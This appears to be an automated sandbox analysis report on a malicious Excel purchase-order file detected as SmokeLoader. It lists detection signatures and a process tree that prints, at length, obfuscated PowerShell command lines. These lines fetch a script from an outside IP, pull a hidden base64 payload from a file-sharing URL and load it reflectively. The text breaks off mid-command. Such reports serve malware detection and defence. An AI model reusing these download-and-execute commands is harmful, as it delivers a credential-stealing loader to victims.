Edit tour
Windows
Analysis Report
#U3010TW-S PO#U3011PO#3311-20241118003.xls
Overview
General Information
| Sample name: | #U3010TW-S PO#U3011PO#3311-20241118003.xlsrenamed because original name is a hash value |
| Original sample name: | TW-S POPO#3311-20241118003.xls |
| Analysis ID: | 1557899 |
| MD5: | 6a9f4cbac228885c734793d88b691d2f |
| SHA1: | e4afd16d467570807b14a28df304ef8f538cf30c |
| SHA256: | 92322c09584ce34faa099794f8a9aa425e7dc08ea803a4f3ff28be197418d8ed |
| Tags: | xlsuser-abuse_ch |
| Infos: |   |
 | |
Detection
HTMLPhisher, SmokeLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected SmokeLoader
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w7x64
EXCEL.EXE (PID: 3224 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
mshta.exe (PID: 3544 cmdline: C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) 
powershell.exe (PID: 3648 cmdline: "C:\Window s\SysTEM32 \wiNdoWSPo WeRShElL\V 1.0\PoWERs HeLl.EXe" "pOWersheL L -E x BY PaSs -nop -W 1 - c De VIcECrEden TiAldePlOY MEnT.exe ; INvokE- EXPressiON ($(INvOkE- ExpressiON ('[SystEM. tExt.encoD inG]'+[cha r]0X3A+[ch ar]58+'UTF 8.GetsTRIn g([SyStEm. cOnVeRT]'+ [ChaR]0X3A +[chaR]58+ 'frombasE6 4StRIng('+ [chaR]34+' JFhvY0VSN2 1mYWMgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICA9 ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgQWRELX RZcGUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAt bWVNYmVSZE VGaW5pVElv TiAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICdbRG xsSW1wb3J0 KCJVcmxNT0 4iLCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIENo YXJTZXQgPS BDaGFyU2V0 LlVuaWNvZG UpXXB1Ymxp YyBzdGF0aW MgZXh0ZXJu IEludFB0ci BVUkxEb3du bG9hZFRvRm lsZShJbnRQ dHIgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBkbk hyTG8sc3Ry aW5nICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgam xXTWh0LHN0 cmluZyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE wsdWludCAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IFVEd1JCWE NTLEludFB0 ciAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIHFFS3 ZxKTsnICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW5BbUUgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AiZHpUayIg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAtTmFNZV NQQUNFICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg bHhzQnRTTV B2ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgLVBh c3NUaHJ1Oy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICRYb2NF UjdtZmFjOj pVUkxEb3du bG9hZFRvRm lsZSgwLCJo dHRwOi8vMT A3LjE3Mi40 NC4xNzgvNT Mvc2VlbXli ZXN0bmV0d2 9ya3doaWNo Z2l2ZWJlc3 R0aGluZ3Nl bnRpcmVsaW Zld2l0aG1l LnRJRiIsIi RFTnY6QVBQ REFUQVxzZW VteWJlc3Ru ZXR3b3Jrd2 hpY2hnaXZl YmVzdHRoaW 5nc2VudGly ZWxpZmV3aX RoLnZiUyIs MCwwKTtzVE FydC1zbEVF UCgzKTtJRV ggICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAiJGVu VjpBUFBEQV RBXHNlZW15 YmVzdG5ldH dvcmt3aGlj aGdpdmViZX N0dGhpbmdz ZW50aXJlbG lmZXdpdGgu dmJTIg=='+ [chaR]0X22 +'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3764 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcE CrEdenTiAl dePlOYMEnT .exe MD5: A575A7610E5F003CC36DF39E07C4BA7D) 
csc.exe (PID: 3860 cmdline: "C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\03wlzt sz\03wlzts z.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3868 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES2B07.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\03w lztsz\CSC2 80AB7AC395 34067B2898 716E8B346. TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) 
wscript.exe (PID: 3960 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\seemy bestnetwor kwhichgive bestthings entirelife with.vbS" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 4012 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCdzZVlpbW FnZVUnKydy bCA9IFB1SW h0JysndHBz JysnOicrJy 8vMTAxNy5m aWxlbWFpbC 5jb20vYXBp L2ZpbCcrJ2 UvZ2V0P2Zp bGVrZXk9Mk FhX2JXbzlS ZXU0NXQ3Ql Uxa1Znc2Q5 cFQ5cGdTU2 x2U3QnKydH cm5USUNmRm htVEtqM0xD NlNRdEljT2 NfVDM1dyZw a192aWQ9Zm Q0ZjYxNGJi MjA5YzYyYz E3MzA5NDUx NzZhMDkwNG YgUHVJO3Nl WXdlYkNsaW VudCA9IE5l dy1PYmplY3 QgU3lzdGVt Lk5ldC5XJy snZWJDbGll bnQ7c2VZaW 1hZ2VCeXRl cyA9IHNlWX dlYkNsaWVu JysndC5Eb3 dubG9hZERh dGEoc2VZaW 1hZ2VVcmwp O3NlWWltYW cnKydlVGV4 dCA9IFtTeX N0ZW0uVGV4 dC5FbmNvZG luZ106OlVU RjguR2V0U3 RyaW5nKHNl WWltYWdlQn l0JysnZXMp O3NlWXN0YX J0RmxhZyA9 IFB1STw8Qk FTRTY0Xycr J1NUQVJUPj 5QdUk7c2VZ ZW5kRicrJ2 xhZyA9IFB1 SScrJzw8Qk FTRTY0X0VO RD4+UHVJO3 NlWXN0YXJ0 SW5kZXggPS BzZVlpbWFn ZVRleHQuSW 5kZXhPZign KydzZVlzdG FydEZsYWcp O3NlWWVuZC crJ0luZGV4 ID0gc2VZaW 1hZ2VUZXh0 LkluZGV4T2 Yoc2VZZW5k RmxhZyk7cy crJ2VZc3Rh cnRJbmRleC AtZ2UgMCAt YW5kIHNlWW VuZEluZGV4 IC1ndCBzZV lzdGFydElu ZGV4O3MnKy dlWXN0YXJ0 SW5kZXggKz 0gc2VZc3Rh cnRGbGFnLk xlbmd0aDtz ZVliYXNlNj RMZW5ndGgg PSBzZVllbm RJbmRleCAt IHNlWXN0YX J0SW5kZXg7 c2VZYmFzZT Y0Q29tbWFu ZCA9JysnIH NlJysnWWlt YWcnKydlVC crJ2V4dC5T dWJzdHJpbm coc2VZc3Rh cnRJbmRleC wnKycgc2VZ YmFzZTY0TG VuZ3RoKTtz ZVliYXNlNj RSZXZlcnNl ZCA9IC1qb2 luIChzZVli YXNlNjRDb2 1tYW5kJysn LlRvQ2hhck FycmF5KCkg MnBPIEZvck UnKydhY2gt T2JqZWN0IH sgc2VZXyB9 KVstMS4uLS hzZVknKydi YXNlNjRDb2 1tYW5kLkxl bmd0aCldO3 NlWScrJ2Nv bW1hbmRCeX RlcyA9IFtT eXN0ZW0uQy crJ29udmVy dF06OkZyb2 1CYXNlNjRT dHJpbmcoJy snc2VZYmFz ZTY0UmV2ZX JzZWQpO3Nl WScrJ2xvYW RlZEFzc2Vt Ymx5ID0gW1 N5c3RlbS5S ZWZsJysnZW N0aW9uLkFz c2VtYmx5XS crJzo6TG9h ZChzZVljb2 1tYW5kQnl0 ZXMpO3NlWX ZhaU1ldGhv ZCA9IFsnKy dkbmxpYi5J Ty5Ib21lXS 5HZXRNZXRo b2QoUHVJVk FJUHVJKTtz ZVl2YWlNZS crJ3Rob2Qu SW52bycrJ2 tlKHNlWW51 bGwsIEAoUH VJdHh0LlRH UkZGUlcvMz UvODcxLjQ0 LjI3MS43MD EvLycrJzpw dHRoUHVJLC BQdUlkZXNh dGl2YWRvUH VJLCBQdUlk JysnZXNhdG l2YWRvUHVJ LCBQdScrJ0 lkZXNhdGl2 YWRvUHVJLC BQdUlhc3Bu ZXRfY29tcG lsJysnZXJQ dUksIFB1SW Rlc2F0aXZh ZG9QdUksIC crJ1B1SWRl c2F0aXZhZG 9QdUksUHVJ ZGVzYXRpdm FkbycrJ1B1 SSxQdUlkZX NhdGl2YWRv UHVJLFB1SW Rlc2F0aXZh ZG9QdUksUH VJZGVzYXRp dmFkb1B1SS xQdUlkZXNh dGl2YWRvUH VJLFB1STFQ dUksUHVJZG VzYXRpdmFk b1B1SSkpOy cpLnJFUGxh Q0UoJ1B1SS csW1N0cklu R11bQ0hBUl 0zOSkuckVQ bGFDRSgnMn BPJywnfCcp LnJFUGxhQ0 UoJ3NlWScs JyQnKXwgLi AoKGdWICcq TWRyKicpLm 5BbUVbMywx MSwyXS1qT0 lOJycp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 2104 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "('seY imageU'+'r l = PuIht' +'tps'+':' +'//1017.f ilemail.co m/api/fil' +'e/get?fi lekey=2Aa_ bWo9Reu45t 7BU1kVgsd9 pT9pgSSlvS t'+'GrnTIC fFhmTKj3LC 6SQtIcOc_T 35w&pk_vid =fd4f614bb 209c62c173 0945176a09 04f PuI;se YwebClient = New-Obj ect System .Net.W'+'e bClient;se YimageByte s = seYweb Clien'+'t. DownloadDa ta(seYimag eUrl);seYi mag'+'eTex t = [Syste m.Text.Enc oding]::UT F8.GetStri ng(seYimag eByt'+'es) ;seYstartF lag = PuI< <BASE64_'+ 'START>>Pu I;seYendF' +'lag = Pu I'+'<<BASE 64_END>>Pu I;seYstart Index = se YimageText .IndexOf(' +'seYstart Flag);seYe nd'+'Index = seYimag eText.Inde xOf(seYend Flag);s'+' eYstartInd ex -ge 0 - and seYend Index -gt seYstartIn dex;s'+'eY startIndex += seYsta rtFlag.Len gth;seYbas e64Length = seYendIn dex - seYs tartIndex; seYbase64C ommand ='+ ' se'+'Yim ag'+'eT'+' ext.Substr ing(seYsta rtIndex,'+ ' seYbase6 4Length);s eYbase64Re versed = - join (seYb ase64Comma nd'+'.ToCh arArray() 2pO ForE'+ 'ach-Objec t { seY_ } )[-1..-(se Y'+'base64 Command.Le ngth)];seY '+'command Bytes = [S ystem.C'+' onvert]::F romBase64S tring('+'s eYbase64Re versed);se Y'+'loaded Assembly = [System.R efl'+'ecti on.Assembl y]'+'::Loa d(seYcomma ndBytes);s eYvaiMetho d = ['+'dn lib.IO.Hom e].GetMeth od(PuIVAIP uI);seYvai Me'+'thod. Invo'+'ke( seYnull, @ (PuItxt.TG RFFRW/35/8 71.44.271. 701//'+':p tthPuI, Pu Idesativad oPuI, PuId '+'esativa doPuI, Pu' +'Idesativ adoPuI, Pu Iaspnet_co mpil'+'erP uI, PuIdes ativadoPuI , '+'PuIde sativadoPu I,PuIdesat ivado'+'Pu I,PuIdesat ivadoPuI,P uIdesativa doPuI,PuId esativadoP uI,PuIdesa tivadoPuI, PuI1PuI,Pu Idesativad oPuI));'). rEPlaCE('P uI',[StrIn G][CHAR]39 ).rEPlaCE( '2pO','|') .rEPlaCE(' seY','$')| . ((gV '* Mdr*').nAm E[3,11,2]- jOIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - aspnet_compiler.exe (PID: 1932 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_compil er.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010) - aspnet_compiler.exe (PID: 3948 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_compil er.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010) 
explorer.exe (PID: 1244 cmdline: C:\Windows \Explorer. EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA) - explorer.exe (PID: 3756 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: 6DDCA324434FFA506CF7DC4E51DB7935) - explorer.exe (PID: 3656 cmdline:
C:\Windows \explorer. exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA) - explorer.exe (PID: 2860 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: 6DDCA324434FFA506CF7DC4E51DB7935) - explorer.exe (PID: 816 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: 6DDCA324434FFA506CF7DC4E51DB7935) - explorer.exe (PID: 2068 cmdline:
C:\Windows \explorer. exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA) - explorer.exe (PID: 2912 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: 6DDCA324434FFA506CF7DC4E51DB7935) - explorer.exe (PID: 2244 cmdline:
C:\Windows \explorer. exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA) - explorer.exe (PID: 2108 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: 6DDCA324434FFA506CF7DC4E51DB7935) - explorer.exe (PID: 2580 cmdline:
C:\Windows \explorer. exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA) 
AcroRd32.exe (PID: 4060 cmdline: "C:\Progra m Files (x 86)\Adobe\ Acrobat Re ader DC\Re ader\AcroR d32.exe" - Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817) - mshta.exe (PID: 1264 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - powershell.exe (PID: 1432 cmdline:
"C:\Window s\SysTEM32 \wiNdoWSPo WeRShElL\V 1.0\PoWERs HeLl.EXe" "pOWersheL L -E x BY PaSs -nop -W 1 - c De VIcECrEden TiAldePlOY MEnT.exe ; INvokE- EXPressiON ($(INvOkE- ExpressiON ('[SystEM. tExt.encoD inG]'+[cha r]0X3A+[ch ar]58+'UTF 8.GetsTRIn g([SyStEm. cOnVeRT]'+ [ChaR]0X3A +[chaR]58+ 'frombasE6 4StRIng('+ [chaR]34+' JFhvY0VSN2 1mYWMgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICA9 ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgQWRELX RZcGUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAt bWVNYmVSZE VGaW5pVElv TiAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICdbRG xsSW1wb3J0 KCJVcmxNT0 4iLCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIENo YXJTZXQgPS BDaGFyU2V0 LlVuaWNvZG UpXXB1Ymxp YyBzdGF0aW MgZXh0ZXJu IEludFB0ci BVUkxEb3du bG9hZFRvRm lsZShJbnRQ dHIgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBkbk hyTG8sc3Ry aW5nICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgam xXTWh0LHN0 cmluZyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE wsdWludCAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IFVEd1JCWE NTLEludFB0 ciAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIHFFS3 ZxKTsnICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW5BbUUgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AiZHpUayIg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAtTmFNZV NQQUNFICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg bHhzQnRTTV B2ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgLVBh c3NUaHJ1Oy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICRYb2NF UjdtZmFjOj pVUkxEb3du bG9hZFRvRm lsZSgwLCJo dHRwOi8vMT A3LjE3Mi40 NC4xNzgvNT Mvc2VlbXli ZXN0bmV0d2 9ya3doaWNo Z2l2ZWJlc3 R0aGluZ3Nl bnRpcmVsaW Zld2l0aG1l LnRJRiIsIi RFTnY6QVBQ REFUQVxzZW VteWJlc3Ru ZXR3b3Jrd2 hpY2hnaXZl YmVzdHRoaW 5nc2VudGly ZWxpZmV3aX RoLnZiUyIs MCwwKTtzVE FydC1zbEVF UCgzKTtJRV ggICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAiJGVu VjpBUFBEQV RBXHNlZW15 YmVzdG5ldH dvcmt3aGlj aGdpdmViZX N0dGhpbmdz ZW50aXJlbG lmZXdpdGgu dmJTIg=='+ [chaR]0X22 +'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3296 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcE CrEdenTiAl dePlOYMEnT .exe MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 3532 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\mffkkn gw\mffkkng w.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 2916 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES845C.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\mff kkngw\CSC9 E50345C585 C4EFF867E1 FFD2050D1A 6.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - wscript.exe (PID: 3592 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\seemy bestnetwor kwhichgive bestthings entirelife with.vbS" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 3556 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCdzZVlpbW FnZVUnKydy bCA9IFB1SW h0JysndHBz JysnOicrJy 8vMTAxNy5m aWxlbWFpbC 5jb20vYXBp L2ZpbCcrJ2 UvZ2V0P2Zp bGVrZXk9Mk FhX2JXbzlS ZXU0NXQ3Ql Uxa1Znc2Q5 cFQ5cGdTU2 x2U3QnKydH cm5USUNmRm htVEtqM0xD NlNRdEljT2 NfVDM1dyZw a192aWQ9Zm Q0ZjYxNGJi MjA5YzYyYz E3MzA5NDUx NzZhMDkwNG YgUHVJO3Nl WXdlYkNsaW VudCA9IE5l dy1PYmplY3 QgU3lzdGVt Lk5ldC5XJy snZWJDbGll bnQ7c2VZaW 1hZ2VCeXRl cyA9IHNlWX dlYkNsaWVu JysndC5Eb3 dubG9hZERh dGEoc2VZaW 1hZ2VVcmwp O3NlWWltYW cnKydlVGV4 dCA9IFtTeX N0ZW0uVGV4 dC5FbmNvZG luZ106OlVU RjguR2V0U3 RyaW5nKHNl WWltYWdlQn l0JysnZXMp O3NlWXN0YX J0RmxhZyA9 IFB1STw8Qk FTRTY0Xycr J1NUQVJUPj 5QdUk7c2VZ ZW5kRicrJ2 xhZyA9IFB1 SScrJzw8Qk FTRTY0X0VO RD4+UHVJO3 NlWXN0YXJ0 SW5kZXggPS BzZVlpbWFn ZVRleHQuSW 5kZXhPZign KydzZVlzdG FydEZsYWcp O3NlWWVuZC crJ0luZGV4 ID0gc2VZaW 1hZ2VUZXh0 LkluZGV4T2 Yoc2VZZW5k RmxhZyk7cy crJ2VZc3Rh cnRJbmRleC AtZ2UgMCAt YW5kIHNlWW VuZEluZGV4 IC1ndCBzZV lzdGFydElu ZGV4O3MnKy dlWXN0YXJ0 SW5kZXggKz 0gc2VZc3Rh cnRGbGFnLk xlbmd0aDtz ZVliYXNlNj RMZW5ndGgg PSBzZVllbm RJbmRleCAt IHNlWXN0YX J0SW5kZXg7 c2VZYmFzZT Y0Q29tbWFu ZCA9JysnIH NlJysnWWlt YWcnKydlVC crJ2V4dC5T dWJzdHJpbm coc2VZc3Rh cnRJbmRleC wnKycgc2VZ YmFzZTY0TG VuZ3RoKTtz ZVliYXNlNj RSZXZlcnNl ZCA9IC1qb2 luIChzZVli YXNlNjRDb2 1tYW5kJysn LlRvQ2hhck FycmF5KCkg MnBPIEZvck UnKydhY2gt T2JqZWN0IH sgc2VZXyB9 KVstMS4uLS hzZVknKydi YXNlNjRDb2 1tYW5kLkxl bmd0aCldO3 NlWScrJ2Nv bW1hbmRCeX RlcyA9IFtT eXN0ZW0uQy crJ29udmVy dF06OkZyb2 1CYXNlNjRT dHJpbmcoJy snc2VZYmFz ZTY0UmV2ZX JzZWQpO3Nl WScrJ2xvYW RlZEFzc2Vt Ymx5ID0gW1 N5c3RlbS5S ZWZsJysnZW N0aW9uLkFz c2VtYmx5XS crJzo6TG9h ZChzZVljb2 1tYW5kQnl0 ZXMpO3NlWX ZhaU1ldGhv ZCA9IFsnKy dkbmxpYi5J Ty5Ib21lXS 5HZXRNZXRo b2QoUHVJVk FJUHVJKTtz ZVl2YWlNZS crJ3Rob2Qu SW52bycrJ2 tlKHNlWW51 bGwsIEAoUH VJdHh0LlRH UkZGUlcvMz UvODcxLjQ0 LjI3MS43MD EvLycrJzpw dHRoUHVJLC BQdUlkZXNh dGl2YWRvUH VJLCBQdUlk JysnZXNhdG l2YWRvUHVJ LCBQdScrJ0 lkZXNhdGl2 YWRvUHVJLC BQdUlhc3Bu ZXRfY29tcG lsJysnZXJQ dUksIFB1SW Rlc2F0aXZh ZG9QdUksIC crJ1B1SWRl c2F0aXZhZG 9QdUksUHVJ ZGVzYXRpdm FkbycrJ1B1 SSxQdUlkZX NhdGl2YWRv UHVJLFB1SW Rlc2F0aXZh ZG9QdUksUH VJZGVzYXRp dmFkb1B1SS xQdUlkZXNh dGl2YWRvUH VJLFB1STFQ dUksUHVJZG VzYXRpdmFk b1B1SSkpOy cpLnJFUGxh Q0UoJ1B1SS csW1N0cklu R11bQ0hBUl 0zOSkuckVQ bGFDRSgnMn BPJywnfCcp LnJFUGxhQ0 UoJ3NlWScs JyQnKXwgLi AoKGdWICcq TWRyKicpLm 5BbUVbMywx MSwyXS1qT0 lOJycp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3836 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "('seY imageU'+'r l = PuIht' +'tps'+':' +'//1017.f ilemail.co m/api/fil' +'e/get?fi lekey=2Aa_ bWo9Reu45t 7BU1kVgsd9 pT9pgSSlvS t'+'GrnTIC fFhmTKj3LC 6SQtIcOc_T 35w&pk_vid =fd4f614bb 209c62c173 0945176a09 04f PuI;se YwebClient = New-Obj ect System .Net.W'+'e bClient;se YimageByte s = seYweb Clien'+'t. DownloadDa ta(seYimag eUrl);seYi mag'+'eTex t = [Syste m.Text.Enc oding]::UT F8.GetStri ng(seYimag eByt'+'es) ;seYstartF lag = PuI< <BASE64_'+ 'START>>Pu I;seYendF' +'lag = Pu I'+'<<BASE 64_END>>Pu I;seYstart Index = se YimageText .IndexOf(' +'seYstart Flag);seYe nd'+'Index = seYimag eText.Inde xOf(seYend Flag);s'+' eYstartInd ex -ge 0 - and seYend Index -gt seYstartIn dex;s'+'eY startIndex += seYsta rtFlag.Len gth;seYbas e64Length = seYendIn dex - seYs tartIndex; seYbase64C ommand ='+ ' se'+'Yim ag'+'eT'+' ext.Substr ing(seYsta rtIndex,'+ ' seYbase6 4Length);s eYbase64Re versed = - join (seYb ase64Comma nd'+'.ToCh arArray() 2pO ForE'+ 'ach-Objec t { seY_ } )[-1..-(se Y'+'base64 Command.Le ngth)];seY '+'command Bytes = [S ystem.C'+' onvert]::F romBase64S tring('+'s eYbase64Re versed);se Y'+'loaded Assembly = [System.R efl'+'ecti on.Assembl y]'+'::Loa d(seYcomma ndBytes);s eYvaiMetho d = ['+'dn lib.IO.Hom e].GetMeth od(PuIVAIP uI);seYvai Me'+'thod. Invo'+'ke( seYnull, @ (PuItxt.TG RFFRW/35/8 71.44.271. 701//'+':p tthPuI, Pu Idesativad oPuI, PuId '+'esativa doPuI, Pu' +'Idesativ adoPuI, Pu Iaspnet_co mpil'+'erP uI, PuIdes ativadoPuI , '+'PuIde sativadoPu 